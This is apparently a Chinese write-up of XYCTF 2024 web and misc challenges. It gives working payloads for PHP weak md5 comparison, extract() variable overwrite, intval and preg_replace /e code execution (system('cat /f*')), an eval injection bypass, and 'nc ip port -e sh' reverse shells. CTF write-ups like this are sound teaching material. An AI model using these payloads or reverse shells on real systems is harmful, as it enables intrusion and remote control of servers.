XYCTF 2024

Web

参考博客:https://www.yuque.com/yunzhiyunweiji/wrgkex/rfpnkn0293l7cp09#ezMake

ezhttp

Via - HTTP | MDN

代理那里难住了

XFF不给用可以用client-ip

ezmd5

让我们上传图片并比较,结合题目名可以猜测应该是比较两个图片的md5值是否相同,用fastcoll工具生成两个相同的图片,然后上传即可。

ez!Make

直接输入cat /flag即可

ezmake

很若至的非预期,出题人居然这个也能忘关flag路由,访问即送flag:

1

http://localhost:39701/flag

参考博客:https://www.yuque.com/yunzhiyunweiji/wrgkex/rfpnkn0293l7cp09#ezMake

ez?Make

fuzz一下,过滤了较多命令,但是nc未过滤,直接连服务器。

反弹shell

nc ip port -e sh


warm up

第一关:

先md5弱比较,使用了强制类型转换后不再接收数组

md5弱比较,为0e开头的会被识别为科学记数法,结果均为0,所以只需找两个md5后都为0e开头且0e后面均为数字的值即可。
不同数据弱相等

payload: a=QNKCDZO&b=240610708

然后是_MD5等于自身_:

如md5( a ) = = a)== a)==a,php弱比较会把0e开头识别为科学计数法,结果均为0,所以此时需要找到一个MD5加密前后都是0e开头的,如0e215962017

然后extract(_GET)是变量覆盖漏洞。

给XY和XYCTF传相同的值即可。

最终payload:

val1=QNKCDZO&val2=240610708&md5=0e215962017&XY=240610708&XYCTF=240610708

第二关:

a不能是数字,但是intval会返回1,了解intval函数特性

成功时返回 var 的 integer 值,失败时返回 0。 空的 array 返回 0,非空的 array 返回 1。

那么传数组进去,a[]=a

下一步是,preg_replace在/e模式下可以任意命令执行
深入研究preg_replace与代码执行 - 先知社区

补充一下preg_replace的用法:

<?php
$str = 'Visit Microsoft!';
$pattern = '/microsoft/i';
echo preg_replace($pattern, 'W3Schools', $str);
?>
输出:Visit W3Schools!

preg_replace /e 模式下的代码执行

<?
echo preg_replace("/test/e",$_GET["h"],"jutst test");
?>
第二个参数所代表的的内容将被执行

最终payload:

?a=/1/e&b=system('cat /f*')&c=1

POST:
a[]=1

牢牢记住,逝者为大

过滤了很多命令,但反引号没过滤,可以用反引号当shell_exec()函数执行命令。

eval前面和后面都有脏数据,最简单的办法是换行和注释绕过。分别在最前和最后加上%0a、%23

这道题没过滤nc,所以照样可以让这边连我们的服务器。

因为cmd有长度限制,所以我们可以用$_GET[1]传递参数。

记得eval中的命令都必须要加分号。

最终payload:

?cmd=%0a`$_GET[1]`;%23&1=nc ip port  -e sh

反弹shell

Misc

game

Google识图即可


Papers Please就是flag

zzl的护理小课堂

ctrl + U查看源代码,发现flag.php

发POST包让score = 100 即可 获得flag

zip套之神

明文攻击

相关推荐
CCSBRIDGE6 分钟前
Magento2项目部署笔记
笔记
亦枫Leonlew1 小时前
微积分复习笔记 Calculus Volume 2 - 5.1 Sequences
笔记·数学·微积分
群联云防护小杜1 小时前
如何给负载均衡平台做好安全防御
运维·服务器·网络·网络协议·安全·负载均衡
ihengshuai1 小时前
HTTP协议及安全防范
网络协议·安全·http
爱码小白1 小时前
网络编程(王铭东老师)笔记
服务器·网络·笔记
蜜獾云1 小时前
linux firewalld 命令详解
linux·运维·服务器·网络·windows·网络安全·firewalld
LuH11242 小时前
【论文阅读笔记】Learning to sample
论文阅读·笔记·图形渲染·点云
黑客Jack2 小时前
防御 XSS 的七条原则
安全·web安全·xss
东方隐侠安全团队-千里2 小时前
网安瞭望台第17期:Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析
网络·chrome·web安全
云云3212 小时前
怎么通过亚矩阵云手机实现营销?
大数据·服务器·安全·智能手机·矩阵